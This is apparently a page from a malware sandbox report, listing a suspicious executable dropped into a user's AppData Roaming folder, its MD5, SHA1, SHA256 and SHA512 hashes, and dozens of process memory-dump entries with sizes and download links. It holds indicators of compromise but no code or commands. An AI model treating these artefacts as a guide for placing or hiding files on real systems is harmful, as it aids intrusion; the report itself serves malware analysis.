\Users\Admin\AppData\Roaming\xpertorigin.exe
MD5
85063571eccad2a81103ea6603ba1e08

SHA1
c762c1e085a489b21c125e75e21683cd86e138c9

SHA256
f5068e95e11b906cf33949376159ed87e03eb29e774029e84b8151c76d69ccf4

SHA512
8a271d14190d2bf5cb9d4a62830b750b64954a9ed5d5ac803dca2ce9e9b38b6a69fd61518e0271dfbddeb20de383d686f6b0d9cfdf26be7ed394b244e41ca12f

Download Submit
memory/112-45-0x000007FEF7120000-0x000007FEF739A000-memory.dmp

Filesize
2.5MB

Download
memory/584-57-0x0000000000423BC0-mapping.dmp

Download
memory/584-56-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/584-59-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/584-58-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/584-60-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/708-67-0x0000000000442F04-mapping.dmp

Download
memory/708-66-0x0000000000400000-0x0000000000459000-memory.dmp

Filesize
356KB

Download
memory/708-68-0x0000000000400000-0x0000000000459000-memory.dmp

Filesize
356KB

Download
memory/912-71-0x0000000000413750-mapping.dmp

Download
memory/912-74-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/912-72-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/912-73-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/912-70-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1112-32-0x0000000000750000-0x00000000008A4000-memory.dmp

Filesize
1.3MB

Download
memory/1112-30-0x0000000000000000-mapping.dmp

Download
memory/1228-63-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1228-61-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1228-62-0x0000000000411654-mapping.dmp

Download
memory/1240-50-0x0000000000401364-mapping.dmp

Download
memory/1240-51-0x0000000000400000-0x0000000000443000-memory.dmp

Filesize
268KB

Download
memory/1240-49-0x0000000000400000-0x0000000000443000-memory.dmp

Filesize
268KB

Download
memory/1328-65-0x0000000000442F04-mapping.dmp

Download
memory/1332-77-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/1332-76-0x000000000040C2A8-mapping.dmp

Download
memory/1332-75-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/1356-2-0x000007FEF7120000-0x000007FEF739A000-memory.dmp

Filesize
2.5MB

Download
memory/1492-8-0x0000000004870000-0x0000000004871000-memory.dmp

Filesize
4KB

Download
memory/1492-7-0x0000000004960000-0x0000000004961000-memory.dmp

Filesize
4KB

Download
memory/1492-26-0x00000000062C0000-0x00000000062C1000-memory.dmp

Filesize
4KB

Download
memory/1492-3-0x0000000000000000-mapping.dmp

Download
memory/1492-18-0x0000000005800000-0x0000000005801000-memory.dmp

Filesize
4KB

Download
memory/1492-17-0x00000000056C0000-0x00000000056C1000-memory.dmp

Filesize
4KB

Download
memory/1492-12-0x0000000005650000-0x0000000005651000-memory.dmp

Filesize
4KB

Download
memory/1492-9-0x0000000005290000-0x0000000005291000-memory.dmp

Filesize
4KB

Download
memory/1492-5-0x000000006A290000-0x000000006A97E000-memory.dmp

Filesize
6.9MB

Download
memory/1492-25-0x0000000006280000-0x0000000006281000-memory.dmp

Filesize
4KB

Download
memory/1492-6-0x0000000000A00000-0x0000000000A01000-memory.dmp

Filesize
4KB

Download
memory/1644-44-0x0000000000401364-mapping.dmp

Download
memory/1652-4-0x0000000000000000-mapping.dmp

Download
memory/2024-47-0x0000000000401364-mapping.dmp

Download
memory/2028-55-0x0000000002790000-0x0000000002794000-memory.dmp

Filesize
16KB

Download
memory/2028-54-0x00000000024A0000-0x00000000024A4000-memory.dmp

Filesize
16KB

Download
memory/2028-35-0x0000000000000000-mapping.dmp

Download